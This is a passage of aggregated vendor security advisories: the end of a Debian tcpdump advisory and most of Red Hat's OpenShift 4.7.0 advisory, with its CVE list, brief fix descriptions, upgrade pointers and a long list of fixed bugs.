email message:                                                     |\n|                                                                        |\n|   unsubscribe slackware-security                                       |\n|                                                                        |\n| You will get a confirmation message back containing instructions to    |\n| complete the process.  Please do not reply to this email address. These vulnerabilities might result in denial of\nservice or, potentially, execution of arbitrary code. \n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 4.9.3-1~deb9u1. \n\nFor the stable distribution (buster), these problems have been fixed in\nversion 4.9.3-1~deb10u1. \n\nFor the detailed security status of tcpdump please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/tcpdump\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAl2uIaAACgkQEMKTtsN8\nTjb5ZA/9FxAE0uHVnbXapPaDdrf4JOElV9+iZho4b87YuSXZKch7y/xUtlHMx6Jy\n9iYzUd2Cwg0OPRyZii3PjiGSxSrKW9xTYnyfPzI7WdPFWRbeVLw9PKUV9R18fE2u\nsvIuKdeHiJd/MabagWqPffn4ZxgfxlG2Px3xtQhnFchDb7yXAsRUIdWwjIyw1fXR\n/lRkaehvKkwBHLYtSTnNnMrZyRYNsZBZ6WSeZ5hIFugq9wwWTYXY3vJxR2IUqhq8\nveQrHg8DVt58G+GhI7EdmEKB9vJrjtNZBlz8VCiGESxSw/BZjCw2vl20gL2JmV0f\n1OA4NaMH7l6Sj2DQDCqHIDN++PGhLkQWUxJHrLV2aqfZ7kn9bxXpX3djUYYjRzpS\nyaHsAsFOp7zwXkebbvV0dFhjLtst39xRJAEr8dAw6DUmfZqIPazdLv+PGGDpEuuq\npcAe6QqrNettT37VCx81PtIQL4BJf1lvTW6VHIwj0MaQ6aFdNImzw/n1ld26ktoV\nfeHER0IM0saIgwj/STOLV1+elNzi9dGdaFArxMRvM/s3fwo8JiYv1qnzfqGtQ6xH\n5QwoBwwMZEEkqBvDCTtyFxLgg+Q/iVavwinxIRIb4Ttkr9M+PBL0WldFntlQRrlN\nSZDCcsvfxjM9aOwNS+tMCoX3CKB7hj94u+ti8MRJCw9I9EOzmZE=\n=bACv\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Moderate: OpenShift Container Platform 4.7.0 security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2020:5633-01\nProduct:           Red Hat OpenShift Enterprise\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2020:5633\nIssue date:        2021-02-24\nCVE Names:         CVE-2018-10103 CVE-2018-10105 CVE-2018-14461 \n                   CVE-2018-14462 CVE-2018-14463 CVE-2018-14464 \n                   CVE-2018-14465 CVE-2018-14466 CVE-2018-14467 \n                   CVE-2018-14468 CVE-2018-14469 CVE-2018-14470 \n                   CVE-2018-14553 CVE-2018-14879 CVE-2018-14880 \n                   CVE-2018-14881 CVE-2018-14882 CVE-2018-16227 \n                   CVE-2018-16228 CVE-2018-16229 CVE-2018-16230 \n                   CVE-2018-16300 CVE-2018-16451 CVE-2018-16452 \n                   CVE-2018-20843 CVE-2019-3884 CVE-2019-5018 \n                   CVE-2019-6977 CVE-2019-6978 CVE-2019-8625 \n                   CVE-2019-8710 CVE-2019-8720 CVE-2019-8743 \n                   CVE-2019-8764 CVE-2019-8766 CVE-2019-8769 \n                   CVE-2019-8771 CVE-2019-8782 CVE-2019-8783 \n                   CVE-2019-8808 CVE-2019-8811 CVE-2019-8812 \n                   CVE-2019-8813 CVE-2019-8814 CVE-2019-8815 \n                   CVE-2019-8816 CVE-2019-8819 CVE-2019-8820 \n                   CVE-2019-8823 CVE-2019-8835 CVE-2019-8844 \n                   CVE-2019-8846 CVE-2019-9455 CVE-2019-9458 \n                   CVE-2019-11068 CVE-2019-12614 CVE-2019-13050 \n                   CVE-2019-13225 CVE-2019-13627 CVE-2019-14889 \n                   CVE-2019-15165 CVE-2019-15166 CVE-2019-15903 \n                   CVE-2019-15917 CVE-2019-15925 CVE-2019-16167 \n                   CVE-2019-16168 CVE-2019-16231 CVE-2019-16233 \n                   CVE-2019-16935 CVE-2019-17450 CVE-2019-17546 \n                   CVE-2019-18197 CVE-2019-18808 CVE-2019-18809 \n                   CVE-2019-19046 CVE-2019-19056 CVE-2019-19062 \n                   CVE-2019-19063 CVE-2019-19068 CVE-2019-19072 \n                   CVE-2019-19221 CVE-2019-19319 CVE-2019-19332 \n                   CVE-2019-19447 CVE-2019-19524 CVE-2019-19533 \n                   CVE-2019-19537 CVE-2019-19543 CVE-2019-19602 \n                   CVE-2019-19767 CVE-2019-19770 CVE-2019-19906 \n                   CVE-2019-19956 CVE-2019-20054 CVE-2019-20218 \n                   CVE-2019-20386 CVE-2019-20387 CVE-2019-20388 \n                   CVE-2019-20454 CVE-2019-20636 CVE-2019-20807 \n                   CVE-2019-20812 CVE-2019-20907 CVE-2019-20916 \n                   CVE-2020-0305 CVE-2020-0444 CVE-2020-1716 \n                   CVE-2020-1730 CVE-2020-1751 CVE-2020-1752 \n                   CVE-2020-1971 CVE-2020-2574 CVE-2020-2752 \n                   CVE-2020-2922 CVE-2020-3862 CVE-2020-3864 \n                   CVE-2020-3865 CVE-2020-3867 CVE-2020-3868 \n                   CVE-2020-3885 CVE-2020-3894 CVE-2020-3895 \n                   CVE-2020-3897 CVE-2020-3898 CVE-2020-3899 \n                   CVE-2020-3900 CVE-2020-3901 CVE-2020-3902 \n                   CVE-2020-6405 CVE-2020-7595 CVE-2020-7774 \n                   CVE-2020-8177 CVE-2020-8492 CVE-2020-8563 \n                   CVE-2020-8566 CVE-2020-8619 CVE-2020-8622 \n                   CVE-2020-8623 CVE-2020-8624 CVE-2020-8647 \n                   CVE-2020-8648 CVE-2020-8649 CVE-2020-9327 \n                   CVE-2020-9802 CVE-2020-9803 CVE-2020-9805 \n                   CVE-2020-9806 CVE-2020-9807 CVE-2020-9843 \n                   CVE-2020-9850 CVE-2020-9862 CVE-2020-9893 \n                   CVE-2020-9894 CVE-2020-9895 CVE-2020-9915 \n                   CVE-2020-9925 CVE-2020-10018 CVE-2020-10029 \n                   CVE-2020-10732 CVE-2020-10749 CVE-2020-10751 \n                   CVE-2020-10763 CVE-2020-10773 CVE-2020-10774 \n                   CVE-2020-10942 CVE-2020-11565 CVE-2020-11668 \n                   CVE-2020-11793 CVE-2020-12465 CVE-2020-12655 \n                   CVE-2020-12659 CVE-2020-12770 CVE-2020-12826 \n                   CVE-2020-13249 CVE-2020-13630 CVE-2020-13631 \n                   CVE-2020-13632 CVE-2020-14019 CVE-2020-14040 \n                   CVE-2020-14381 CVE-2020-14382 CVE-2020-14391 \n                   CVE-2020-14422 CVE-2020-15157 CVE-2020-15503 \n                   CVE-2020-15862 CVE-2020-15999 CVE-2020-16166 \n                   CVE-2020-24490 CVE-2020-24659 CVE-2020-25211 \n                   CVE-2020-25641 CVE-2020-25658 CVE-2020-25661 \n                   CVE-2020-25662 CVE-2020-25681 CVE-2020-25682 \n                   CVE-2020-25683 CVE-2020-25684 CVE-2020-25685 \n                   CVE-2020-25686 CVE-2020-25687 CVE-2020-25694 \n                   CVE-2020-25696 CVE-2020-26160 CVE-2020-27813 \n                   CVE-2020-27846 CVE-2020-28362 CVE-2020-29652 \n                   CVE-2021-2007 CVE-2021-3121 \n=====================================================================\n\n1. Summary:\n\nRed Hat OpenShift Container Platform release 4.7.0 is now available. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.7.0. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHSA-2020:5634\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel\nease-notes.html\n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.0-x86_64\n\nThe image digest is\nsha256:d74b1cfa81f8c9cc23336aee72d8ae9c9905e62c4874b071317a078c316f8a70\n\n(For s390x architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.0-s390x\n\nThe image digest is\nsha256:a68ca03d87496ddfea0ac26b82af77231583a58a7836b95de85efe5e390ad45d\n\n(For ppc64le architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.0-ppc64le\n\nThe image digest is\nsha256:bc7b04e038c8ff3a33b827f4ee19aa79b26e14c359a7dcc1ced9f3b58e5f1ac6\n\nAll OpenShift Container Platform 4.7 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster\n- -between-minor.html#understanding-upgrade-channels_updating-cluster-between\n- -minor. \n\nSecurity Fix(es):\n\n* crewjam/saml: authentication bypass in saml authentication\n(CVE-2020-27846)\n\n* golang: crypto/ssh: crafted authentication request can lead to nil\npointer dereference (CVE-2020-29652)\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index\nvalidation (CVE-2021-3121)\n\n* nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)\n\n* kubernetes: Secret leaks in kube-controller-manager when using vSphere\nProvider (CVE-2020-8563)\n\n* containernetworking/plugins: IPv6 router advertisements allow for MitM\nattacks on IPv4 clusters (CVE-2020-10749)\n\n* heketi: gluster-block volume password details available in logs\n(CVE-2020-10763)\n\n* golang.org/x/text: possibility to trigger an infinite loop in\nencoding/unicode could lead to crash (CVE-2020-14040)\n\n* jwt-go: access restriction bypass vulnerability (CVE-2020-26160)\n\n* golang-github-gorilla-websocket: integer overflow leads to denial of\nservice (CVE-2020-27813)\n\n* golang: math/big: panic during recursive division of very large numbers\n(CVE-2020-28362)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n3. Solution:\n\nFor OpenShift Container Platform 4.7, see the following documentation,\nwhich\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster\n- -cli.html. \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1620608 - Restoring deployment config with history leads to weird state\n1752220 - [OVN] Network Policy fails to work when project label gets overwritten\n1756096 - Local storage operator should implement must-gather spec\n1756173 - /etc/udev/rules.d/66-azure-storage.rules missing from initramfs\n1768255 - installer reports 100% complete but failing components\n1770017 - Init containers restart when the exited container is removed from node. \n1775057 - [MSTR-485] Cluster is abnormal after etcd backup/restore when the backup is conducted during etcd encryption is migrating\n1775444 - RFE: k8s cpu manager does not restrict /usr/bin/pod cpuset\n1777038 - Cluster scaled beyond host subnet limits does not fire alert or cleanly report why it cannot scale\n1777224 - InfraID in metadata.json and .openshift_install_state.json is not consistent when repeating `create` commands\n1784298 - \"Displaying with reduced resolution due to large dataset.\" would show under some conditions\n1785399 - Under condition of heavy pod creation, creation fails with \u0027error reserving pod name ...: name is reserved\"\n1797766 - Resource Requirements\" specDescriptor fields - CPU and Memory injects empty string YAML editor\n1801089 - [OVN] Installation failed and monitoring pod not created due to some network error. \n1805025 - [OSP] Machine status doesn\u0027t become \"Failed\" when creating a machine with invalid image\n1805639 - Machine status should be \"Failed\" when creating a machine with invalid machine configuration\n1806000 - CRI-O failing with: error reserving ctr name\n1806915 - openshift-service-ca: Some core components are in openshift.io/run-level 1 and are bypassing SCC, but should not be\n1806917 - openshift-service-ca-operator: Some core components are in openshift.io/run-level 1 and are bypassing SCC, but should not be\n1810438 - Installation logs are not gathered from OCP nodes\n1812085 - kubernetes-networking-namespace-pods dashboard doesn\u0027t exist\n1812412 - Monitoring Dashboard: on restricted cluster, query timed out in expression evaluation\n1813012 - EtcdDiscoveryDomain no longer needed\n1813949 - openshift-install doesn\u0027t use env variables for OS_* for some of API endpoints\n1816812 - OpenShift test suites are not resilient to rate limited registries (like docker.io) and cannot control their dependencies for offline use\n1819053 - loading OpenAPI spec for \"v1beta1.metrics.k8s.io\" failed with: OpenAPI spec does not exist\n1819457 - Package Server is in \u0027Cannot update\u0027 status despite properly working\n1820141 - [RFE] deploy qemu-quest-agent on the nodes\n1822744 - OCS Installation CI test flaking\n1824038 - Integration Tests: StaleElementReferenceError in OLM single-installmode scenario\n1825892 - StorageClasses and PVs are not cleaned completely after running the csi verification tool\n1826301 - Wrong NodeStatus reports in file-integrity scan when configuration error in aide.conf file\n1829723 - User workload monitoring alerts fire out of the box\n1832968 - oc adm catalog mirror does not mirror the index image itself\n1833012 - Lower OVNKubernetes HTTP E/W performance compared with OpenShiftSDN\n1833220 - CVE-2020-10749 containernetworking/plugins: IPv6 router advertisements allow for MitM attacks on IPv4 clusters\n1834995 - olmFull suite always fails once th suite is run on the same cluster\n1836017 - vSphere UPI: Both Internal and External load balancers for kube-apiserver should use /readyz\n1837953 - Replacing masters doesn\u0027t work for ovn-kubernetes 4.4\n1838352 - OperatorExited, Pending marketplace-operator-... pod for several weeks\n1838751 - [oVirt][Tracker] Re-enable skipped network tests\n1839239 - csi-snapshot-controller flickers Degraded=True on etcd hiccups\n1840759 - [aws-ebs-csi-driver] The volume created by aws ebs csi driver can not be deleted when the cluster is destroyed\n1841039 - authentication-operator: Add e2e test for password grants to Keycloak being set as OIDC IdP\n1841119 - Get rid of config patches and pass flags directly to kcm\n1841175 - When an Install Plan gets deleted, OLM does not create a new one\n1841381 - Issue with memoryMB validation\n1841885 - oc adm catalog mirror command attempts to pull from registry.redhat.io when using --from-dir option\n1844727 - Etcd container leaves grep and lsof zombie processes\n1845387 - CVE-2020-10763 heketi: gluster-block volume password details available in logs\n1847074 - Filter bar layout issues at some screen widths on search page\n1848358 - CRDs with preserveUnknownFields:true don\u0027t reflect in status that they are non-structural\n1849543 - [4.5]kubeletconfig\u0027s description will show multiple lines for finalizers when upgrade from 4.4.8-\u003e4.5\n1851103 - Use of NetworkManager-wait-online.service in rhcos-growpart.service\n1851203 - [GSS] [RFE] Need a simpler representation of capactiy breakdown in total usage and per project breakdown in OCS 4 dashboard\n1851351 - OCP 4.4.9: EtcdMemberIPMigratorDegraded: rpc error: code = Canceled desc = grpc: the client connection is closing\n1851693 - The `oc apply` should return errors instead of hanging there when failing to create the CRD\n1852289 - Upgrade testsuite fails on ppc64le environment - Unsupported LoadBalancer service\n1853115 - the restriction of --cloud option should be shown in help text. \n1853116 - `--to` option does not work with `--credentials-requests` flag. \n1853352 - [v2v][UI] Storage Class fields Should  Not be empty  in VM  disks view\n1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash\n1854567 - \"Installed Operators\" list showing \"duplicated\" entries during installation\n1855325 - [Feature:Prometheus][Conformance] Prometheus when installed on the cluster [Top Level] [Feature:Prometheus][Conformance] Prometheus when installed on the cluster should report telemetry if a cloud.openshift.com token is present\n1855351 - Inconsistent Installer reactions to Ctrl-C during user input process\n1855408 - OVN cluster unstable after running minimal scale test\n1856351 - Build page should show metrics for when the build ran, not the last 30 minutes\n1856354 - New APIServices missing from OpenAPI definitions\n1857446 - ARO/Azure: excessive pod memory allocation causes node lockup\n1857877 - Operator upgrades can delete existing CSV before completion\n1858578 - [v2v] [ui] VM import RHV to CNV Target VM Name longer than 63 chars should not be allowed\n1859174 - [IPI][OSP] Having errors from 4.3 to 4.6 about Security group rule already created\n1860136 - default ingress does not propagate annotations to route object on update\n1860322 - [OCPv4.5.2] after unexpected shutdown one of RHV Hypervisors, OCP worker nodes machine are marked as \"Failed\"\n1860518 - unable to stop a crio pod\n1861383 - Route with `haproxy.router.openshift.io/timeout: 365d` kills the ingress controller\n1862430 - LSO: PV creation lock should not be acquired in a loop\n1862489 - LSO autoprovisioning should exclude top level disks that are part of LVM volume group. \n1862608 - Virtual media does not work on hosts using BIOS, only UEFI\n1862918 - [v2v] User should only select SRIOV network when importin vm with SRIOV network\n1865743 - Some pods are stuck in ContainerCreating and some sdn pods are in CrashLoopBackOff\n1865839 - rpm-ostree fails with \"System transaction in progress\" when moving to kernel-rt\n1866043 - Configurable table column headers can be illegible\n1866087 - Examining agones helm chart resources results in \"Oh no!\"\n1866261 - Need to indicate the intentional behavior for Ansible in the `create api` help info\n1866298 - [RHOCS Usability Study][Installation] Labeling the namespace should be a part of the installation flow or be clearer as a requirement\n1866320 - [RHOCS Usability Study][Dashboard] Users were confused by Available Capacity and the Total Capacity\n1866334 - [RHOCS Usability Study][Installation] On the Operator installation page, there\u2019s no indication on which labels offer tooltip/help\n1866340 - [RHOCS Usability Study][Dashboard] It was not clear why \u201cNo persistent storage alerts\u201d was prominently displayed\n1866343 - [RHOCS Usability Study][Dashboard] User wanted to know the time frame for Data Consumption, e.g I/O Operations\n1866445 - kola --basic-qemu-scenarios scenario fail on ppc64le \u0026 s390x\n1866482 - Few errors are seen when oc adm must-gather is run\n1866605 - No metadata.generation set for build and buildconfig objects\n1866873 - MCDDrainError \"Drain failed on  , updates may be blocked\" missing rendered node name\n1866901 - Deployment strategy for BMO allows multiple pods to run at the same time\n1866925 - openshift-install destroy cluster should fail quickly when provided with invalid credentials on Azure. \n1867165 - Cannot assign static address to baremetal install bootstrap vm\n1867380 - When using webhooks in OCP 4.5 fails to rollout latest deploymentconfig\n1867400 - [OCs 4.5]UI should not allow creation of second storagecluster of different mode in a single OCS\n1867477 - HPA monitoring cpu utilization fails for deployments which have init containers\n1867518 - [oc] oc should not print so many goroutines when ANY command fails\n1867608 - ds/machine-config-daemon takes 100+ minutes to rollout on  250 node cluster\n1867965 - OpenShift Console Deployment Edit overwrites deployment yaml\n1868004 - opm index add appears to produce image with wrong registry server binary\n1868065 - oc -o jsonpath prints possible warning / bug \"Unable to decode server response into a Table\"\n1868104 - Baremetal actuator should not delete Machine objects\n1868125 - opm index add is not creating an index with valid images when --permissive flag is added, the index is empty instead\n1868384 - CLI does not save login credentials as expected when using the same username in multiple clusters\n1868527 - OpenShift Storage using VMWare vSAN receives error \"Failed to add disk \u0027scsi0:2\u0027\" when mounted pod is created on separate node\n1868645 - After a disaster recovery pods a stuck in \"NodeAffinity\" state and not running\n1868748 - ClusterProvisioningIP in baremetal platform has wrong JSON annotation\n1868765 - [vsphere][ci] could not reserve an IP address: no available addresses\n1868770 - catalogSource named \"redhat-operators\" deleted in a disconnected cluster\n1868976 - Prometheus error opening query log file on EBS backed PVC\n1869293 - The configmap name looks confusing in aide-ds pod logs\n1869606 - crio\u0027s failing to delete a network namespace\n1870337 - [sig-storage] Managed cluster should have no crashlooping recycler pods over four minutes\n1870342 - [sig-scheduling] SchedulerPredicates [Serial] validates resource limits of pods that are allowed to run  [Conformance]\n1870373 - Ingress Operator reports available when DNS fails to provision\n1870467 - D/DC Part of Helm / Operator Backed should not have HPA\n1870728 - openshift-install creates expired ignition files from stale .openshift_install_state.json\n1870800 - [4.6] Managed Column not appearing on Pods Details page\n1871170 - e2e tests are needed to validate the functionality of the etcdctl container\n1872001 - EtcdDiscoveryDomain no longer needed\n1872095 - content are expanded to the whole line when only one column in table on Resource Details page\n1872124 - Could not choose device type as \"disk\" or \"part\" when create localvolumeset from web console\n1872128 - Can\u0027t run container with hostPort on ipv6 cluster\n1872166 - \u0027Silences\u0027 link redirects to unexpected \u0027Alerts\u0027 view after creating a silence in the Developer perspective\n1872251 - [aws-ebs-csi-driver] Verify job in CI doesn\u0027t check for vendor dir sanity\n1872786 - Rules in kube-apiserver.rules are taking too long and consuming too much memory for Prometheus to evaluate them\n1872821 - [DOC] Typo in Ansible Operator Tutorial\n1872907 - Fail to create CR from generated Helm Base Operator\n1872923 - Click \"Cancel\" button on the \"initialization-resource\" creation form page should send users to the \"Operator details\" page instead of \"Install Operator\" page (previous page)\n1873007 - [downstream] failed to read config when running the operator-sdk in the home path\n1873030 - Subscriptions without any candidate operators should cause resolution to fail\n1873043 - Bump to latest available 1.19.x k8s\n1873114 - Nodes goes into NotReady state (VMware)\n1873288 - Changing Cluster-Wide Pull Secret Does Not Trigger Updates In Kubelet Filesystem\n1873305 - Failed to power on /inspect node when using Redfish protocol\n1873326 - Accessibility - The symbols e.g checkmark in the overview page has no text description, label, or other accessible information\n1873480 - Accessibility - No text description, alt text, label, or other accessible information associated with the help icon: \u201c?\u201d button/icon in Developer Console -\u003eNavigation\n1873556 - [Openstack] HTTP_PROXY setting for NetworkManager-resolv-prepender not working\n1873593 - MCO fails to cope with ContainerRuntimeConfig thas has a name \u003e 63 characters\n1874057 - Pod stuck in CreateContainerError - error msg=\"container_linux.go:348: starting container process caused \\\"chdir to cwd (\\\\\\\"/mount-point\\\\\\\") set in config.json failed: permission denied\\\"\"\n1874074 - [CNV] Windows 2019 Default Template Not Defaulting to Proper NIC/Storage Driver\n1874192 - [RFE] \"Create Backing Store\" page doesn\u0027t allow to select already defined k8s secret as target bucket credentials when Google Cloud Storage is selected as a provider\n1874240 - [vsphere] unable to deprovision - Runtime error list attached objects\n1874248 - Include validation for vcenter host in the install-config\n1874340 - vmware: NodeClockNotSynchronising alert is triggered in openshift cluster after upgrading form 4.4.16 to 4.5.6\n1874583 - apiserver tries and fails to log an event when shutting down\n1874584 - add retry for etcd errors in kube-apiserver\n1874638 - Missing logging for nbctl daemon\n1874736 - [downstream] no version info for the helm-operator\n1874901 - add utm_source parameter to Red Hat Marketplace URLs for attribution\n1874968 - Accessibility: The project selection drop down is a keyboard trap\n1875247 - Dependency resolution error \"found more than one head for channel\" is unhelpful for users\n1875516 - disabled scheduling is easy to miss in node page of OCP console\n1875598 - machine status is Running for a master node which has been terminated from the console\n1875806 - When creating a service of type \"LoadBalancer\" (Kuryr,OVN) communication through this loadbalancer failes after 2-5 minutes. \n1876166 - need to be able to disable kube-apiserver connectivity checks\n1876469 - Invalid doc link on yaml template schema description\n1876701 - podCount specDescriptor change doesn\u0027t take effect on operand details page\n1876815 - Installer uses the environment variable OS_CLOUD for manifest generation despite explicit prompt\n1876935 - AWS volume snapshot is not deleted after the cluster is destroyed\n1877071 - vSphere IPI - Nameserver limits were exceeded, some nameservers have been omitted\n1877105 - add redfish to enabled_bios_interfaces\n1877116 - e2e aws calico tests fail with `rpc error: code = ResourceExhausted`\n1877273 - [OVN] EgressIP cannot fail over to available nodes after one egressIP node shutdown\n1877648 - [sriov]VF from allocatable and capacity of node is incorrect when the policy is only \u0027rootDevices\u0027\n1877681 - Manually created PV can not be used\n1877693 - dnsrecords specify recordTTL as 30 but the value is null in AWS Route 53\n1877740 - RHCOS unable to get ip address during first boot\n1877812 - [ROKS] IBM cloud failed to terminate OSDs when upgraded between internal builds of OCS 4.5\n1877919 - panic in multus-admission-controller\n1877924 - Cannot set BIOS config using Redfish with Dell iDracs\n1878022 - Met imagestreamimport error when import the whole image repository\n1878086 - OCP 4.6+OCS 4.6(multiple SC) Internal Mode- UI should populate the default \"Filesystem Name\" instead of providing a textbox, \u0026 the name should be validated\n1878301 - [4.6] [UI] Unschedulable used to always be displayed when Node is Ready status\n1878701 - After deleting and recreating a VM with same name, the VM events contain the events from the old VM\n1878766 - CPU consumption on nodes is higher than the CPU count of the node. \n1878772 - On the nodes there are up to 547 zombie processes caused by thanos and Prometheus. \n1878823 - \"oc adm release mirror\" generating incomplete imageContentSources when using \"--to\" and \"--to-release-image\"\n1878845 - 4.5 to 4.6.rc.4 upgrade failure: authentication operator health check connection refused for multitenant mode\n1878900 - Installer complains about not enough vcpu for the baremetal flavor where generic bm flavor is being used\n1878953 - RBAC error shows when normal user access pvc upload page\n1878956 - `oc api-resources` does not include API version\n1878972 - oc adm release mirror removes the architecture information\n1879013 - [RFE]Improve CD-ROM interface selection\n1879056 - UI should allow to change or unset the evictionStrategy\n1879057 - [CSI Certificate Test] Test failed for CSI certification tests for CSIdriver openshift-storage.rbd.csi.ceph.com with RWX enabled\n1879094 - RHCOS dhcp kernel parameters not working as expected\n1879099 - Extra reboot during 4.5 -\u003e 4.6 upgrade\n1879244 - Error adding container to network \"ipvlan-host-local\": \"master\" field is required\n1879248 - OLM Cert Dir for Webhooks does not align SDK/Kubebuilder\n1879282 - Update OLM references to point to the OLM\u0027s new doc site\n1879283 - panic after nil pointer dereference in pkg/daemon/update.go\n1879365 - Overlapping, divergent openshift-cluster-storage-operator manifests\n1879419 - [RFE]Improve boot source description for \u0027Container\u0027 and \u2018URL\u2019\n1879430 - openshift-object-counts quota is not dynamically updating as the resource is deleted. \n1879565 - IPv6 installation fails on node-valid-hostname\n1879777 - Overlapping, divergent openshift-machine-api namespace manifests\n1879878 - Messages flooded in thanos-querier pod- oauth-proxy container: Authorization header does not start with \u0027Basic\u0027, skipping basic authentication in Log message in thanos-querier pod the oauth-proxy\n1879930 - Annotations shouldn\u0027t be removed during object reconciliation\n1879976 - No other channel visible from console\n1880068 - image pruner is not aware of image policy annotation, StatefulSets, etc. \n1880148 - dns daemonset rolls out slowly in large clusters\n1880161 - Actuator Update calls should have fixed retry time\n1880259 - additional network + OVN network installation failed\n1880389 - Pipeline Runs with skipped Tasks incorrectly show Tasks as \"Failed\"\n1880410 - Convert Pipeline Visualization node to SVG\n1880417 - [vmware] Fail to boot with Secure Boot enabled, kernel lockdown denies iopl access to afterburn\n1880443 - broken machine pool management on OpenStack\n1880450 - Host failed to install because its installation stage joined took longer than expected 20m0s. \n1880473 - IBM Cloudpak operators installation stuck \"UpgradePending\" with InstallPlan status updates failing due to size limitation\n1880680 - [4.3] [Tigera plugin] - openshift-kube-proxy fails - Failed to execute iptables-restore: exit status 4 (iptables-restore v1.8.4 (nf_tables)\n1880785 - CredentialsRequest missing description in `oc explain`\n1880787 - No description for Provisioning CRD for `oc explain`\n1880902 - need dnsPlocy set in crd ingresscontrollers\n1880913 - [DeScheduler] - change loglevel from Info to Error when priority class given in the descheduler params is not present in the cluster\n1881027 - Cluster installation fails at with error :  the container name \\\"assisted-installer\\\" is already in use\n1881046 - [OSP] openstack-cinder-csi-driver-operator doesn\u0027t contain required manifests and assets\n1881155 - operator install authentication: Authentication require functional ingress which requires at least one schedulable and ready node\n1881268 - Image uploading failed but wizard claim the source is available\n1881322 - kube-scheduler not scheduling pods for certificates not renewed automatically after nodes restoration\n1881347 - [v2v][ui]VM Import Wizard does not call Import provider cleanup\n1881881 - unable to specify target port manually resulting in application not reachable\n1881898 - misalignment of sub-title in quick start headers\n1882022 - [vsphere][ipi] directory path is incomplete, terraform can\u0027t find the cluster\n1882057 - Not able to select access modes for snapshot and clone\n1882140 - No description for spec.kubeletConfig\n1882176 - Master recovery instructions don\u0027t handle IP change well\n1882191 - Installation fails against external resources which lack DNS Subject Alternative Name\n1882209 - [ BateMetal IPI ] local coredns resolution not working\n1882210 - [release 4.7] insights-operator: Fix bug in reflector not recovering from \"Too large resource version\"\n1882268 - [e2e][automation]Add Integration Test for Snapshots\n1882361 - Retrieve and expose the latest report for the cluster\n1882485 - dns-node-resolver corrupts /etc/hosts if internal registry is not in use\n1882556 - git:// protocol in origin tests is not currently proxied\n1882569 - CNO: Replacing masters doesn\u0027t work for ovn-kubernetes 4.4\n1882608 - Spot instance not getting created on AzureGovCloud\n1882630 - Fstype is changed after deleting pv provisioned by localvolumeset instance\n1882649 - IPI installer labels all images it uploads into glance as qcow2\n1882653 - The Approval should display the Manual after the APPROVAL changed to Manual from the Automatic\n1882658 - [RFE] Volume Snapshot is not listed under inventory in Project Details page\n1882660 - Operators in a namespace should be installed together when approve one\n1882667 - [ovn] br-ex Link not found when scale up RHEL worker\n1882723 - [vsphere]Suggested mimimum value for providerspec not working\n1882730 - z systems not reporting correct core count in recording rule\n1882750 - [sig-api-machinery][Feature:APIServer][Late] kubelet terminates kube-apiserver gracefully\n1882781 - nameserver= option to dracut creates extra NM connection profile\n1882785 - Multi-Arch CI Jobs destroy libvirt network but occasionally leave it defined\n1882844 - [IPI on vsphere] Executing \u0027openshift-installer destroy cluster\u0027 leaves installer tag categories in vsphere\n1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability\n1883388 - Bare Metal Hosts Details page doesn\u0027t show Mainitenance and Power On/Off status\n1883422 - operator-sdk cleanup fail after installing operator with \"run bundle\" without installmode and og with ownnamespace\n1883425 - Gather top installplans and their count\n1883502 - Logging is broken due to mix of k8s.io/klog v1 and v2\n1883523 - [sig-cli] oc adm must-gather runs successfully for audit logs [Suite:openshift/conformance/parallel]\n1883538 - must gather report \"cannot file manila/aws ebs/ovirt csi related namespaces and objects\" error\n1883560 - operator-registry image needs clean up in /tmp\n1883563 - Creating duplicate namespace from create namespace modal breaks the UI\n1883614 - [OCP 4.6] [UI] UI should not describe power cycle as \"graceful\"\n1883642 - [sig-imageregistry][Feature:ImageTriggers][Serial] ImageStream admission TestImageStreamAdmitSpecUpdate\n1883660 - e2e-metal-ipi CI job consistently failing on 4.4\n1883765 - [user workload monitoring] improve latency of Thanos sidecar  when streaming read requests\n1883766 - [e2e][automation] Adjust tests for UI changes\n1883768 - [user workload monitoring] The Prometheus operator should discard invalid TLS configurations\n1883773 - opm alpha bundle build fails on 